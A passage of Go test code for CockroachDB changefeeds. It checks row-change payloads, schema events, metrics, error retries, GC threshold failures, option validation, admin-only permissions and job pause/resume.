func TestChangefeedUpdatePrimaryKey(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
// The NOT NULL column b guards against a regression that was triggered by
// UPDATE-ing a primary key column and by DELETE.
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING NOT NULL)`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (0, 'bar')`)
foo := feed(t, f, `CREATE CHANGEFEED FOR foo`)
defer closeFeed(t, foo)
assertPayloads(t, foo, []string{
`foo: [0]->{"after": {"a": 0, "b": "bar"}}`,
})
sqlDB.Exec(t, `UPDATE foo SET a = 1`)
assertPayloads(t, foo, []string{
`foo: [0]->{"after": null}`,
`foo: [1]->{"after": {"a": 1, "b": "bar"}}`,
})
sqlDB.Exec(t, `DELETE FROM foo`)
assertPayloads(t, foo, []string{
`foo: [1]->{"after": null}`,
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestChangefeedTruncateRenameDrop(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE truncate (a INT PRIMARY KEY)`)
sqlDB.Exec(t, `CREATE TABLE truncate_cascade (b INT PRIMARY KEY REFERENCES truncate (a))`)
sqlDB.Exec(t,
`BEGIN; INSERT INTO truncate VALUES (1); INSERT INTO truncate_cascade VALUES (1); COMMIT`)
truncate := feed(t, f, `CREATE CHANGEFEED FOR truncate`)
defer closeFeed(t, truncate)
truncateCascade := feed(t, f, `CREATE CHANGEFEED FOR truncate_cascade`)
defer closeFeed(t, truncateCascade)
assertPayloads(t, truncate, []string{`truncate: [1]->{"after": {"a": 1}}`})
assertPayloads(t, truncateCascade, []string{`truncate_cascade: [1]->{"after": {"b": 1}}`})
sqlDB.Exec(t, `TRUNCATE TABLE truncate CASCADE`)
if _, err := truncate.Next(); !testutils.IsError(err, `"truncate" was dropped or truncated`) {
t.Errorf(`expected ""truncate" was dropped or truncated" error got: %+v`, err)
}
if _, err := truncateCascade.Next(); !testutils.IsError(
err, `"truncate_cascade" was dropped or truncated`,
) {
t.Errorf(`expected ""truncate_cascade" was dropped or truncated" error got: %+v`, err)
}
sqlDB.Exec(t, `CREATE TABLE rename (a INT PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO rename VALUES (1)`)
rename := feed(t, f, `CREATE CHANGEFEED FOR rename`)
defer closeFeed(t, rename)
assertPayloads(t, rename, []string{`rename: [1]->{"after": {"a": 1}}`})
sqlDB.Exec(t, `ALTER TABLE rename RENAME TO renamed`)
sqlDB.Exec(t, `INSERT INTO renamed VALUES (2)`)
if _, err := rename.Next(); !testutils.IsError(err, `"rename" was renamed to "renamed"`) {
t.Errorf(`expected ""rename" was renamed to "renamed"" error got: %+v`, err)
}
sqlDB.Exec(t, `CREATE TABLE drop (a INT PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO drop VALUES (1)`)
drop := feed(t, f, `CREATE CHANGEFEED FOR drop`)
defer closeFeed(t, drop)
assertPayloads(t, drop, []string{`drop: [1]->{"after": {"a": 1}}`})
sqlDB.Exec(t, `DROP TABLE drop`)
if _, err := drop.Next(); !testutils.IsError(err, `"drop" was dropped or truncated`) {
t.Errorf(`expected ""drop" was dropped or truncated" error got: %+v`, err)
}
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestChangefeedMonitoring(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
beforeEmitRowCh := make(chan struct{}, 2)
knobs := f.Server().(*server.TestServer).Cfg.TestingKnobs.
DistSQL.(*execinfra.TestingKnobs).
Changefeed.(*TestingKnobs)
knobs.BeforeEmitRow = func(_ context.Context) error {
<-beforeEmitRowCh
return nil
}
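// Every emitted row now blocks until the test sends on beforeEmitRowCh,
// which lets the test induce and then relieve backpressure.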
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (1)`)
s := f.Server()
if c := s.MustGetSQLCounter(`changefeed.emitted_messages`); c != 0 {
t.Errorf(`expected 0 got %d`, c)
}
if c := s.MustGetSQLCounter(`changefeed.emitted_bytes`); c != 0 {
t.Errorf(`expected 0 got %d`, c)
}
if c := s.MustGetSQLCounter(`changefeed.emit_nanos`); c != 0 {
t.Errorf(`expected 0 got %d`, c)
}
if c := s.MustGetSQLCounter(`changefeed.flushes`); c != 0 {
t.Errorf(`expected 0 got %d`, c)
}
if c := s.MustGetSQLCounter(`changefeed.flush_nanos`); c != 0 {
t.Errorf(`expected 0 got %d`, c)
}
if c := s.MustGetSQLCounter(`changefeed.max_behind_nanos`); c != 0 {
t.Errorf(`expected %d got %d`, 0, c)
}
if c := s.MustGetSQLCounter(`changefeed.buffer_entries.in`); c != 0 {
t.Errorf(`expected 0 got %d`, c)
}
if c := s.MustGetSQLCounter(`changefeed.buffer_entries.out`); c != 0 {
t.Errorf(`expected 0 got %d`, c)
}
beforeEmitRowCh <- struct{}{}
foo := feed(t, f, `CREATE CHANGEFEED FOR foo`)
_, _ = foo.Next()
testutils.SucceedsSoon(t, func() error {
if c := s.MustGetSQLCounter(`changefeed.emitted_messages`); c != 1 {
return errors.Errorf(`expected 1 got %d`, c)
}
if c := s.MustGetSQLCounter(`changefeed.emitted_bytes`); c != 22 {
return errors.Errorf(`expected 22 got %d`, c)
}
if c := s.MustGetSQLCounter(`changefeed.emit_nanos`); c <= 0 {
return errors.Errorf(`expected > 0 got %d`, c)
}
if c := s.MustGetSQLCounter(`changefeed.flushes`); c <= 0 {
return errors.Errorf(`expected > 0 got %d`, c)
}
if c := s.MustGetSQLCounter(`changefeed.flush_nanos`); c <= 0 {
return errors.Errorf(`expected > 0 got %d`, c)
}
if c := s.MustGetSQLCounter(`changefeed.max_behind_nanos`); c <= 0 {
return errors.Errorf(`expected > 0 got %d`, c)
}
if c := s.MustGetSQLCounter(`changefeed.buffer_entries.in`); c <= 0 {
return errors.Errorf(`expected > 0 got %d`, c)
}
if c := s.MustGetSQLCounter(`changefeed.buffer_entries.out`); c <= 0 {
return errors.Errorf(`expected > 0 got %d`, c)
}
return nil
})
// Not reading from foo will backpressure it and max_behind_nanos will grow.
sqlDB.Exec(t, `INSERT INTO foo VALUES (2)`)
const expectedLatency = 100 * time.Millisecond
sqlDB.Exec(t, `SET CLUSTER SETTING kv.closed_timestamp.target_duration = $1`,
(expectedLatency / 3).String())
sqlDB.Exec(t, `SET CLUSTER SETTING kv.closed_timestamp.close_fraction = 1.0`)
testutils.SucceedsSoon(t, func() error {
waitForBehindNanos := 2 * expectedLatency.Nanoseconds()
if c := s.MustGetSQLCounter(`changefeed.max_behind_nanos`); c < waitForBehindNanos {
return errors.Errorf(
`waiting for the feed to be > %d nanos behind got %d`, waitForBehindNanos, c)
}
return nil
})
// Unblocking the emit should bring the max_behind_nanos back down.
// Unfortunately, this is sensitive to how many closed timestamp updates are
// received. If we get them too fast, it takes longer to process them than
// they come in and we fall continually further behind. The target_duration
// and close_fraction settings above are tuned to try to avoid this.
close(beforeEmitRowCh)
_, _ = foo.Next()
testutils.SucceedsSoon(t, func() error {
waitForBehindNanos := expectedLatency.Nanoseconds()
if c := s.MustGetSQLCounter(`changefeed.max_behind_nanos`); c > waitForBehindNanos {
return errors.Errorf(
`waiting for the feed to be < %d nanos behind got %d`, waitForBehindNanos, c)
}
return nil
})
// Check that two changefeeds add correctly.
// Set cluster settings back so we don't interfere with schema changes.
sqlDB.Exec(t, `SET CLUSTER SETTING kv.closed_timestamp.target_duration = '1s'`)
fooCopy := feed(t, f, `CREATE CHANGEFEED FOR foo`)
_, _ = fooCopy.Next()
_, _ = fooCopy.Next()
testutils.SucceedsSoon(t, func() error {
// We can't assert exactly 4 or 88 in case we get (allowed) duplicates
// from RangeFeed.
if c := s.MustGetSQLCounter(`changefeed.emitted_messages`); c < 4 {
return errors.Errorf(`expected >= 4 got %d`, c)
}
if c := s.MustGetSQLCounter(`changefeed.emitted_bytes`); c < 88 {
return errors.Errorf(`expected >= 88 got %d`, c)
}
return nil
})
// Cancel all the changefeeds and check that max_behind_nanos returns to 0.
require.NoError(t, foo.Close())
require.NoError(t, fooCopy.Close())
testutils.SucceedsSoon(t, func() error {
if c := s.MustGetSQLCounter(`changefeed.max_behind_nanos`); c != 0 {
return errors.Errorf(`expected 0 got %d`, c)
}
return nil
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, func(t *testing.T) {
t.Skip("https://github.com/cockroachdb/cockroach/issues/38443")
enterpriseTest(testFn)
})
}
func TestChangefeedRetryableError(t *testing.T) {
defer leaktest.AfterTest(t)()
defer utilccl.TestingEnableEnterprise()()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
knobs := f.Server().(*server.TestServer).Cfg.TestingKnobs.
DistSQL.(*execinfra.TestingKnobs).
Changefeed.(*TestingKnobs)
origAfterSinkFlushHook := knobs.AfterSinkFlush
var failSink int64
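// failSink selects the hook's behavior: 0 delegates to the original hook,
// 1 returns a retryable error, and 2 returns a terminal error.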
failSinkHook := func() error {
switch atomic.LoadInt64(&failSink) {
case 1:
return MarkRetryableError(fmt.Errorf("synthetic retryable error"))
case 2:
return fmt.Errorf("synthetic terminal error")
}
return origAfterSinkFlushHook()
}
knobs.AfterSinkFlush = failSinkHook
// Set up a new feed and verify that the sink is started up.
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY)`)
foo := feed(t, f, `CREATE CHANGEFEED FOR foo`)
defer closeFeed(t, foo)
sqlDB.Exec(t, `INSERT INTO foo VALUES (1)`)
assertPayloads(t, foo, []string{
`foo: [1]->{"after": {"a": 1}}`,
})
// Set sink to return unique retryable errors and insert a row. Verify that
// sink is failing requests.
atomic.StoreInt64(&failSink, 1)
sqlDB.Exec(t, `INSERT INTO foo VALUES (2)`)
registry := f.Server().JobRegistry().(*jobs.Registry)
retryCounter := registry.MetricsStruct().Changefeed.(*Metrics).ErrorRetries
testutils.SucceedsSoon(t, func() error {
if retryCounter.Counter.Count() < 3 {
return fmt.Errorf("insufficient error retries detected")
}
return nil
})
// Fix the sink and insert another row. Check that nothing funky happened.
atomic.StoreInt64(&failSink, 0)
sqlDB.Exec(t, `INSERT INTO foo VALUES (3)`)
assertPayloads(t, foo, []string{
`foo: [2]->{"after": {"a": 2}}`,
`foo: [3]->{"after": {"a": 3}}`,
})
// Set sink to return a terminal error and insert a row. Ensure that we
// eventually get the error message back out.
atomic.StoreInt64(&failSink, 2)
sqlDB.Exec(t, `INSERT INTO foo VALUES (4)`)
for {
_, err := foo.Next()
if err == nil {
continue
}
require.EqualError(t, err, `synthetic terminal error`)
break
}
}
// Only the enterprise version uses jobs.
t.Run(`enterprise`, enterpriseTest(testFn))
}
// TestChangefeedDataTTL ensures that changefeeds fail with an error in the case
// where the feed has fallen behind the GC TTL of the table data.
func TestChangefeedDataTTL(t *testing.T) {
defer leaktest.AfterTest(t)()
t.Skip("https://github.com/cockroachdb/cockroach/issues/37154")
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
ctx := context.Background()
// Set a very simple channel-based, wait-and-resume function as the
// BeforeEmitRow hook.
var shouldWait int32
wait := make(chan struct{})
resume := make(chan struct{})
knobs := f.Server().(*server.TestServer).Cfg.TestingKnobs.
DistSQL.(*execinfra.TestingKnobs).
Changefeed.(*TestingKnobs)
knobs.BeforeEmitRow = func(_ context.Context) error {
if atomic.LoadInt32(&shouldWait) == 0 {
return nil
}
wait <- struct{}{}
<-resume
return nil
}
sqlDB := sqlutils.MakeSQLRunner(db)
// Create the data table; it will only contain a single row with multiple
// versions.
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING)`)
counter := 0
upsertRow := func() {
counter++
sqlDB.Exec(t, `UPSERT INTO foo (a, b) VALUES (1, $1)`, fmt.Sprintf("version %d", counter))
}
// Create the initial version of the row and the changefeed itself. The initial
// version is necessary to prevent CREATE CHANGEFEED itself from hanging.
upsertRow()
dataExpiredRows := feed(t, f, "CREATE CHANGEFEED FOR TABLE foo")
defer closeFeed(t, dataExpiredRows)
// Set up our emit trap and update the row, which will allow us to "pause" the
// changefeed in order to force a GC.
atomic.StoreInt32(&shouldWait, 1)
upsertRow()
<-wait
// Upsert two additional versions. One of these will be deleted by the GC
// process before changefeed polling is resumed.
upsertRow()
upsertRow()
// Force a GC of the table. This should cause both older versions of the
// row to be deleted, with the middle version being lost to the changefeed.
forceTableGC(t, f.Server(), sqlDB, "d", "foo")
// Resume our changefeed normally.
atomic.StoreInt32(&shouldWait, 0)
resume <- struct{}{}
// Verify that, at some point, Next() returns a "must be after replica GC
// threshold" error. In the common case, that'll be the third call, but
// various conditions will cause RangeFeed to emit duplicates and so it may
// be a few more.
//
// TODO(tbg): this should keep track of the values seen and once we have
// observed all four (which should never happen), fail the test.
for {
msg, err := dataExpiredRows.Next()
if testutils.IsError(err, `must be after replica GC threshold`) {
break
}
if msg != nil {
log.Infof(ctx, "ignoring message %s", msg)
}
}
}
t.Run("sinkless", sinklessTest(testFn))
t.Run("enterprise", enterpriseTest(testFn))
}
// TestChangefeedSchemaTTL ensures that changefeeds fail with an error in the case
// where the feed has fallen behind the GC TTL of the table's schema.
func TestChangefeedSchemaTTL(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
// Set a very simple channel-based, wait-and-resume function as the
// BeforeEmitRow hook.
var shouldWait int32
wait := make(chan struct{})
resume := make(chan struct{})
knobs := f.Server().(*server.TestServer).Cfg.TestingKnobs.
DistSQL.(*execinfra.TestingKnobs).
Changefeed.(*TestingKnobs)
knobs.BeforeEmitRow = func(_ context.Context) error {
if atomic.LoadInt32(&shouldWait) == 0 {
return nil
}
wait <- struct{}{}
<-resume
return nil
}
sqlDB := sqlutils.MakeSQLRunner(db)
// Create the data table; it will only contain a single row with multiple
// versions.
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING)`)
counter := 0
upsertRow := func() {
counter++
sqlDB.Exec(t, `UPSERT INTO foo (a, b) VALUES (1, $1)`, fmt.Sprintf("version %d", counter))
}
// Create the initial version of the row and the changefeed itself. The initial
// version is necessary to prevent CREATE CHANGEFEED itself from hanging.
upsertRow()
dataExpiredRows := feed(t, f, "CREATE CHANGEFEED FOR TABLE foo")
defer closeFeed(t, dataExpiredRows)
// Set up our emit trap and update the row, which will allow us to "pause" the
// changefeed in order to force a GC.
atomic.StoreInt32(&shouldWait, 1)
upsertRow()
<-wait
// Add two new schema versions, upserting a row after each. One of the
// schema versions will be deleted by the GC process before changefeed
// polling is resumed.
waitForSchemaChange(t, sqlDB, "ALTER TABLE foo ADD COLUMN c STRING")
upsertRow()
waitForSchemaChange(t, sqlDB, "ALTER TABLE foo ADD COLUMN d STRING")
upsertRow()
// Force a GC of the system.descriptor table. This should cause the older
// schema versions to be deleted, with the middle version being lost to the
// changefeed.
forceTableGC(t, f.Server(), sqlDB, "system", "descriptor")
// Resume our changefeed normally.
atomic.StoreInt32(&shouldWait, 0)
resume <- struct{}{}
// Verify that the third call to Next() returns an error (the first is the
// initial row, the second is the first change; the third should detect the
// GC interval mismatch).
_, _ = dataExpiredRows.Next()
_, _ = dataExpiredRows.Next()
if _, err := dataExpiredRows.Next(); !testutils.IsError(err, `GC threshold`) {
t.Errorf(`expected "GC threshold" error got: %+v`, err)
}
}
t.Run("sinkless", sinklessTest(testFn))
t.Run("enterprise", enterpriseTest(testFn))
}
func TestChangefeedErrors(t *testing.T) {
defer leaktest.AfterTest(t)()
ctx := context.Background()
s, db, _ := serverutils.StartServer(t, base.TestServerArgs{})
defer s.Stopper().Stop(ctx)
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `CREATE DATABASE d`)
// Changefeeds default to rangefeed, but for now, rangefeed defaults to off.
// Verify that this produces a useful error.
sqlDB.Exec(t, `SET CLUSTER SETTING kv.rangefeed.enabled = false`)
sqlDB.Exec(t, `CREATE TABLE rangefeed_off (a INT PRIMARY KEY)`)
sqlDB.ExpectErr(
t, `rangefeeds require the kv.rangefeed.enabled setting`,
`EXPERIMENTAL CHANGEFEED FOR rangefeed_off`,
)
sqlDB.Exec(t, `SET CLUSTER SETTING kv.rangefeed.enabled TO DEFAULT`)
sqlDB.ExpectErr(
t, `unknown format: nope`,
`EXPERIMENTAL CHANGEFEED FOR foo WITH format=nope`,
)
sqlDB.ExpectErr(
t, `unknown envelope: nope`,
`EXPERIMENTAL CHANGEFEED FOR foo WITH envelope=nope`,
)
sqlDB.ExpectErr(
t, `negative durations are not accepted: resolved='-1s'`,
`EXPERIMENTAL CHANGEFEED FOR foo WITH resolved='-1s'`,
)
sqlDB.ExpectErr(
t, `cannot specify timestamp in the future`,
`EXPERIMENTAL CHANGEFEED FOR foo WITH cursor=$1`, timeutil.Now().Add(time.Hour),
)
sqlDB.ExpectErr(
t, `omit the SINK clause`,
`CREATE CHANGEFEED FOR foo INTO ''`,
)
sqlDB.ExpectErr(
t, `omit the SINK clause`,
`CREATE CHANGEFEED FOR foo INTO $1`, ``,
)
enableEnterprise := utilccl.TestingDisableEnterprise()
sqlDB.ExpectErr(
t, `CHANGEFEED requires an enterprise license`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope`,
)
enableEnterprise()
// Watching system.jobs would create a cycle, since the resolved timestamp
// high-water mark is saved in it.
sqlDB.ExpectErr(
t, `not supported on system tables`,
`EXPERIMENTAL CHANGEFEED FOR system.jobs`,
)
sqlDB.ExpectErr(
t, `table "bar" does not exist`,
`EXPERIMENTAL CHANGEFEED FOR bar`,
)
sqlDB.Exec(t, `CREATE SEQUENCE seq`)
sqlDB.ExpectErr(
t, `CHANGEFEED cannot target sequences: seq`,
`EXPERIMENTAL CHANGEFEED FOR seq`,
)
sqlDB.Exec(t, `CREATE VIEW vw AS SELECT a, b FROM foo`)
sqlDB.ExpectErr(
t, `CHANGEFEED cannot target views: vw`,
`EXPERIMENTAL CHANGEFEED FOR vw`,
)
// Backup has the same bad error message; see #28170.
sqlDB.ExpectErr(
t, `"information_schema.tables" does not exist`,
`EXPERIMENTAL CHANGEFEED FOR information_schema.tables`,
)
// TODO(dan): These two tests shouldn't need initial data in the table
// to pass.
sqlDB.Exec(t, `CREATE TABLE dec (a DECIMAL PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO dec VALUES (1.0)`)
sqlDB.ExpectErr(
t, `pq: column a: decimal with no precision`,
`EXPERIMENTAL CHANGEFEED FOR dec WITH format=$1, confluent_schema_registry=$2`,
changefeedbase.OptFormatAvro, `bar`,
)
sqlDB.Exec(t, `CREATE TABLE "oid" (a OID PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO "oid" VALUES (3::OID)`)
sqlDB.ExpectErr(
t, `pq: column a: type OID not yet supported with avro`,
`EXPERIMENTAL CHANGEFEED FOR "oid" WITH format=$1, confluent_schema_registry=$2`,
changefeedbase.OptFormatAvro, `bar`,
)
// Check that confluent_schema_registry is only accepted if format is avro.
sqlDB.ExpectErr(
t, `unknown sink query parameter: confluent_schema_registry`,
`CREATE CHANGEFEED FOR foo INTO $1`, `experimental-sql://d/?confluent_schema_registry=foo`,
)
// Check unavailable kafka.
sqlDB.ExpectErr(
t, `client has run out of available brokers`,
`CREATE CHANGEFEED FOR foo INTO 'kafka://nope'`,
)
// kafka_topic_prefix was referenced by an old version of the RFC; it's
// "topic_prefix" now.
sqlDB.ExpectErr(
t, `unknown sink query parameter: kafka_topic_prefix`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?kafka_topic_prefix=foo`,
)
// schema_topic will be implemented but isn't yet.
sqlDB.ExpectErr(
t, `schema_topic is not yet supported`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?schema_topic=foo`,
)
// Sanity check Kafka TLS parameters.
sqlDB.ExpectErr(
t, `param tls_enabled must be a bool`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?tls_enabled=foo`,
)
sqlDB.ExpectErr(
t, `param ca_cert must be base 64 encoded`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?ca_cert=!`,
)
sqlDB.ExpectErr(
t, `ca_cert requires tls_enabled=true`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?&ca_cert=Zm9v`,
)
sqlDB.ExpectErr(
t, `param client_cert must be base 64 encoded`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?client_cert=!`,
)
sqlDB.ExpectErr(
t, `param client_key must be base 64 encoded`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?client_key=!`,
)
sqlDB.ExpectErr(
t, `client_cert requires tls_enabled=true`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?client_cert=Zm9v`,
)
sqlDB.ExpectErr(
t, `client_cert requires client_key to be set`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?tls_enabled=true&client_cert=Zm9v`,
)
sqlDB.ExpectErr(
t, `client_key requires client_cert to be set`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?tls_enabled=true&client_key=Zm9v`,
)
sqlDB.ExpectErr(
t, `invalid client certificate`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?tls_enabled=true&client_cert=Zm9v&client_key=Zm9v`,
)
// Sanity check Kafka SASL parameters.
sqlDB.ExpectErr(
t, `param sasl_enabled must be a bool`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?sasl_enabled=maybe`,
)
sqlDB.ExpectErr(
t, `param sasl_handshake must be a bool`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?sasl_enabled=true&sasl_handshake=maybe`,
)
sqlDB.ExpectErr(
t, `sasl_enabled must be enabled to configure SASL handshake behavior`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?sasl_handshake=false`,
)
sqlDB.ExpectErr(
t, `sasl_user must be provided when SASL is enabled`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?sasl_enabled=true`,
)
sqlDB.ExpectErr(
t, `sasl_password must be provided when SASL is enabled`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?sasl_enabled=true&sasl_user=a`,
)
sqlDB.ExpectErr(
t, `sasl_enabled must be enabled if a SASL user is provided`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?sasl_user=a`,
)
sqlDB.ExpectErr(
t, `sasl_enabled must be enabled if a SASL password is provided`,
`CREATE CHANGEFEED FOR foo INTO $1`, `kafka://nope/?sasl_password=a`,
)
// The avro format doesn't support key_in_value yet.
sqlDB.ExpectErr(
t, `key_in_value is not supported with format=experimental_avro`,
`CREATE CHANGEFEED FOR foo INTO $1 WITH key_in_value, format='experimental_avro'`,
`kafka://nope`,
)
// The cloudStorageSink is particular about the options it will work with.
sqlDB.ExpectErr(
t, `this sink is incompatible with format=experimental_avro`,
`CREATE CHANGEFEED FOR foo INTO $1 WITH format='experimental_avro', confluent_schema_registry=$2`,
`experimental-nodelocal://0/bar`, `schemareg-nope`,
)
sqlDB.ExpectErr(
t, `this sink is incompatible with envelope=key_only`,
`CREATE CHANGEFEED FOR foo INTO $1 WITH envelope='key_only'`,
`experimental-nodelocal://0/bar`,
)
// WITH key_in_value requires envelope=wrapped
sqlDB.ExpectErr(
t, `key_in_value is only usable with envelope=wrapped`,
`CREATE CHANGEFEED FOR foo INTO $1 WITH key_in_value, envelope='key_only'`, `kafka://nope`,
)
sqlDB.ExpectErr(
t, `key_in_value is only usable with envelope=wrapped`,
`CREATE CHANGEFEED FOR foo INTO $1 WITH key_in_value, envelope='row'`, `kafka://nope`,
)
// WITH diff requires envelope=wrapped
sqlDB.ExpectErr(
t, `diff is only usable with envelope=wrapped`,
`CREATE CHANGEFEED FOR foo INTO $1 WITH diff, envelope='key_only'`, `kafka://nope`,
)
sqlDB.ExpectErr(
t, `diff is only usable with envelope=wrapped`,
`CREATE CHANGEFEED FOR foo INTO $1 WITH diff, envelope='row'`, `kafka://nope`,
)
// WITH initial_scan and no_initial_scan disallowed
sqlDB.ExpectErr(
t, `cannot specify both initial_scan and no_initial_scan`,
`CREATE CHANGEFEED FOR foo INTO $1 WITH initial_scan, no_initial_scan`, `kafka://nope`,
)
sqlDB.ExpectErr(
t, `cannot specify both initial_scan and no_initial_scan`,
`CREATE CHANGEFEED FOR foo INTO $1 WITH no_initial_scan, initial_scan`, `kafka://nope`,
)
}
func TestChangefeedPermissions(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `CREATE USER testuser`)
s := f.Server()
pgURL, cleanupFunc := sqlutils.PGUrl(
t, s.ServingSQLAddr(), "TestChangefeedPermissions-testuser", url.User("testuser"),
)
defer cleanupFunc()
testuser, err := gosql.Open("postgres", pgURL.String())
if err != nil {
t.Fatal(err)
}
defer testuser.Close()
stmt := `EXPERIMENTAL CHANGEFEED FOR foo`
if strings.Contains(t.Name(), `enterprise`) {
stmt = `CREATE CHANGEFEED FOR foo`
}
if _, err := testuser.Exec(stmt); !testutils.IsError(err, `only users with the admin role`) {
t.Errorf(`expected 'only users with the admin role' error got: %+v`, err)
}
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestChangefeedDescription(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (1)`)
// Intentionally don't use the TestFeedFactory because we want to
// control the placeholders.
s := f.Server()
sink, cleanup := sqlutils.PGUrl(t, s.ServingSQLAddr(), t.Name(), url.User(security.RootUser))
defer cleanup()
sink.Scheme = changefeedbase.SinkSchemeExperimentalSQL
sink.Path = `d`
var jobID int64
sqlDB.QueryRow(t,
`CREATE CHANGEFEED FOR foo INTO $1 WITH updated, envelope = $2`, sink.String(), `wrapped`,
).Scan(&jobID)
var description string
sqlDB.QueryRow(t,
`SELECT description FROM [SHOW JOBS] WHERE job_id = $1`, jobID,
).Scan(&description)
expected := `CREATE CHANGEFEED FOR TABLE foo INTO '` + sink.String() +
`' WITH envelope = 'wrapped', updated`
if description != expected {
t.Errorf(`got "%s" expected "%s"`, description, expected)
}
}
// Only the enterprise version uses jobs.
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestChangefeedPauseUnpause(t *testing.T) {
defer leaktest.AfterTest(t)()
defer func(i time.Duration) { jobs.DefaultAdoptInterval = i }(jobs.DefaultAdoptInterval)
jobs.DefaultAdoptInterval = 10 * time.Millisecond
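// Shorten the job adopt interval so the paused job is picked back up
// quickly after RESUME JOB.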
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (1, 'a'), (2, 'b'), (4, 'c'), (7, 'd'), (8, 'e')`)
foo := feed(t, f, `CREATE CHANGEFEED FOR foo WITH resolved`).(*cdctest.TableFeed)
defer closeFeed(t, foo)
assertPayloads(t, foo, []string{
`foo: [1]->{"after": {"a": 1, "b": "a"}}`,
`foo: [2]->{"after": {"a": 2, "b": "b"}}`,
`foo: [4]->{"after": {"a": 4, "b": "c"}}`,
`foo: [7]->{"after": {"a": 7, "b": "d"}}`,
`foo: [8]->{"after": {"a": 8, "b": "e"}}`,
})
// Wait for the high-water mark on the job to be updated after the initial
// scan, to make sure we don't get the initial scan data again.
m, err := foo.Next()
if err != nil {
t.Fatal(err)
} else if m.Key != nil {
t.Fatalf(`expected a resolved timestamp got %s: %s->%s`, m.Topic, m.Key, m.Value)
}
sqlDB.Exec(t, `PAUSE JOB $1`, foo.JobID)
// PAUSE JOB only requests the job to be paused. Block until it's paused.
opts := retry.Options{
InitialBackoff: 1 * time.Millisecond,
MaxBackoff: time.Second,
Multiplier: 2,
}
ctx := context.Background()
if err := retry.WithMaxAttempts(ctx, opts, 10, func() error {
var status string
sqlDB.QueryRow(t, `SELECT status FROM system.jobs WHERE id = $1`, foo.JobID).Scan(&status)
if jobs.Status(status) != jobs.StatusPaused {
return errors.New("could not pause job")
}
return nil
}); err != nil {
t.Fatal(err)
}
sqlDB.Exec(t, `INSERT INTO foo VALUES (16, 'f')`)
sqlDB.Exec(t, `RESUME JOB $1`, foo.JobID)
assertPayloads(t, foo, []string{
`foo: [16]->{"after": {"a": 16, "b": "f"}}`,
})
}
// Only the enterprise version uses jobs.
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestChangefeedPauseUnpauseCursorAndInitialScan(t *testing.T) {
defer leaktest.AfterTest(t)()
